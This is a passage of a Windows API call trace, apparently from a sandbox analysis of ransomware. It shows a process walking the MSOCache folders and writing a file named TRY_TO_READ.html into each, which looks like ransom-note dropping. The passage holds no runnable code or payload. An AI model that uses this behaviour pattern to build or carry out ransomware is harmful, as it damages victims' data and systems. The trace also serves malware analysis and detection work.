	[0052.093] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.094] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.094] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.094] CloseHandle (hObject=0x444) returned 1
	[0052.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589228 | out: hHeap=0x540000) returned 1
	[0052.094] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1
	[0052.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.094] GetLastError () returned 0x0
	[0052.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.094] GetLastError () returned 0x0
	[0052.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a57b0
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0052.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.095] GetLastError () returned 0x0
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589338 | out: hHeap=0x540000) returned 1
	[0052.095] GetLastError () returned 0x0
	[0052.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.095] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.097] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.097] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.098] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.098] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.098] CloseHandle (hObject=0x444) returned 1
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5892b0 | out: hHeap=0x540000) returned 1
	[0052.098] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.098] GetLastError () returned 0x0
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.098] GetLastError () returned 0x0
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5892b0
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5760
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0052.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.099] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.099] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.099] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0052.099] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.099] GetLastError () returned 0x0
	[0052.099] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.099] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5893c0 | out: hHeap=0x540000) returned 1
	[0052.099] GetLastError () returned 0x0
	[0052.099] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.099] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.101] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.101] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.102] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.102] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.102] CloseHandle (hObject=0x444) returned 1
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589338 | out: hHeap=0x540000) returned 1
	[0052.103] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.103] GetLastError () returned 0x0
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.103] GetLastError () returned 0x0
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589338
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5710
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0052.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.104] GetLastError () returned 0x0
	[0052.104] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.104] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589448 | out: hHeap=0x540000) returned 1
	[0052.104] GetLastError () returned 0x0
	[0052.104] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.104] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.107] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.108] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.108] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.108] CloseHandle (hObject=0x444) returned 1
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5893c0 | out: hHeap=0x540000) returned 1
	[0052.108] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.108] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.108] GetLastError () returned 0x0
	[0052.108] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.108] GetLastError () returned 0x0
	[0052.108] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.108] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.108] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0052.108] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a56c0
	[0052.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0052.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0052.109] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.109] GetLastError () returned 0x0
	[0052.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.109] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5894d0 | out: hHeap=0x540000) returned 1
	[0052.109] GetLastError () returned 0x0
	[0052.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.109] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.111] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.111] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.112] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.112] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.112] CloseHandle (hObject=0x444) returned 1
	[0052.112] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.112] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.112] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.112] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589448 | out: hHeap=0x540000) returned 1
	[0052.112] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1
	[0052.112] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.112] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.113] GetLastError () returned 0x0
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.113] GetLastError () returned 0x0
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589448
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5670
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0052.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.113] GetLastError () returned 0x0
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589558 | out: hHeap=0x540000) returned 1
	[0052.113] GetLastError () returned 0x0
	[0052.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.113] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.115] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.115] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.116] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.116] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.116] CloseHandle (hObject=0x444) returned 1
	[0052.116] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.116] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.116] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.116] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5894d0 | out: hHeap=0x540000) returned 1
	[0052.116] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1
	[0052.116] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.116] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.116] GetLastError () returned 0x0
	[0052.116] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.117] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.117] GetLastError () returned 0x0
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.117] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.117] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5620
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0052.117] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.117] GetLastError () returned 0x0
	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.117] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0052.117] GetLastError () returned 0x0
